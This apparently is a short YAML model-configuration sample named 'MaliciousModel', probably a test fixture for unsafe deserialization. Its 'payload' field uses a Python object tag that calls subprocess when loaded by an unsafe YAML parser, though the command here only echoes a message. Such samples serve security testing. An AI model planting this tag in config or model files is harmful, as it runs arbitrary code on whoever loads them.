7ad9444
1
2
3
4
5
6
7
8
9
model: name: MaliciousModel layers: 3 activation: relu payload: !!python/object/apply:subprocess.check_output args: [["echo", "Malicious YAML model executed!"]] kwds: {shell: false}